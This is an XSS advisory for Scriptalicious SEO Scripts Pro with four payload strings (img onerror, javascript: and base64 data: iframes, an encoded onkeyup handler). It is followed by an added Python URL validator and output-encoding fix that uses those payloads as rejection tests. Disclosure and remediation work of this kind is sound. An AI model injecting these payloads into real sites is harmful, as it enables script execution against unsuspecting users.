Scriptalicious Pro Cross Site Scripting
Posted on 04 June 2013
# Exploit Title: Scriptalicious Pro Cross Site Scripting
# Date: 06/01/2013
# Author: Nikhalesh Singh Bhadoria
# Twitter: @nikhaleshsingh
# Download Link: scriptalicious.com
# Versions Affected: All
# Category: XSS
------------------------------------------------------------------------

Description:
The URL input in Scriptalicious SEO Scripts Pro is not sanitized, which results in stored cross-site scripting.

POC: http://www.youtube.com/watch?v=EFVtRLJ56L8&feature=youtu.be

Code:
########################################################################
"><img src=x onerror=prompt(0);>
<iframe %00 src="	javascript:prompt(1)	"%00>
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<form><textarea onkeyup='u0061u006Cu0065u0072u0074(1)'>
########################################################################

Fix: Better sanitization by restricting special characters.

Regards,
Nikhalesh Singh Bhadoria
Information Security Enthusiast
Website: Gurunsb.com
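A server-side check for the URL field plus output encoding for the stored value, as an added example that is not part of the original advisory or of Scriptalicious code; the function names and the 2048-character limit are assumptions. It goes beyond restricting special characters by also allowlisting the URL scheme, since a value such as `javascript:prompt(1)` contains no quotes or angle brackets.

```python
import html
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# Characters with no place in a stored URL field; a real URL percent-encodes them.
FORBIDDEN_CHARS = set("\"'<>`\\")

# The four strings from the advisory's "Code" section, used only as rejection tests.
PAGE_POC_INPUTS = [
    '"><img src=x onerror=prompt(0);>',
    '<iframe %00 src="\tjavascript:prompt(1)\t"%00>',
    '<iframe/src="data:text/html;\tbase64\t,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">',
    "<form><textarea onkeyup='u0061u006Cu0065u0072u0074(1)'>",
]


def validate_url(raw):
    """Return the URL if it is an acceptable http(s) URL, else None."""
    if not isinstance(raw, str) or not raw or len(raw) > 2048:
        return None
    # Spaces, tabs, NUL and other control characters are rejected, not stripped.
    if any(ord(ch) <= 0x20 or ord(ch) == 0x7F for ch in raw):
        return None
    if FORBIDDEN_CHARS & set(raw):
        return None
    try:
        parts = urlsplit(raw)
        host, _ = parts.hostname, parts.port  # .port raises ValueError if malformed
    except ValueError:
        return None
    # Scheme allowlist: character filtering alone would pass "javascript:..." values.
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not host:
        return None
    return parts.geturl()


def render_link(stored_url):
    """Encode at output time so a value already in the database is still inert."""
    safe = html.escape(stored_url, quote=True)
    return '<a href="{0}" rel="nofollow noopener">{0}</a>'.format(safe)


if __name__ == "__main__":
    for candidate in PAGE_POC_INPUTS + ["javascript:prompt(1)", "https://example.com/a?b=1"]:
        print(repr(candidate), "->", validate_url(candidate))
```

Because the issue is stored XSS, entries saved before validation was added stay in the database, so the encoding in `render_link` is needed wherever the value is displayed.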
